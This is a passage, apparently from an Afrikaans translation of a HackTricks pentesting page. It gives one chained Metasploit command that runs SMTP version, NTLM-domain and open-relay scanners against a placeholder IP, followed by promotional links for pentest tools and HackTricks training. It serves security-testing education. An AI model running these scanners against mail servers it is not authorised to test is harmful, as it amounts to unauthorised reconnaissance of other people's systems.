Command: msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_version; set RHOSTS {IP}; set RPORT 25; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_ntlm_domain; set RHOSTS {IP}; set RPORT 25; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_relay; set RHOSTS {IP}; set RPORT 25; run; exit'
```
<figure><img src="../../.gitbook/assets/image (11).png" alt=""><figcaption></figcaption></figure>
**Onmiddellik beskikbare opstelling vir kwesbaarheidsassessering & pentesting**. Voer 'n volledige pentest uit vanaf enige plek met 20+ gereedskap & kenmerke wat strek vanaf rekognisering tot verslagdoening. Ons vervang nie pentesters nie - ons ontwikkel aangepaste gereedskap, opsporing & uitbuitingsmodules om hulle 'n bietjie tyd terug te gee om dieper te delf, skulpe te laat pop, en pret te hê.
{% embed url="https://pentest-tools.com/" %}
<details>
<summary><strong>Leer AWS-hacking vanaf nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Ander maniere om HackTricks te ondersteun:
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat** Kyk na die [**INSKRYWINGSPLANNE**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**Die PEASS-familie**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
</details>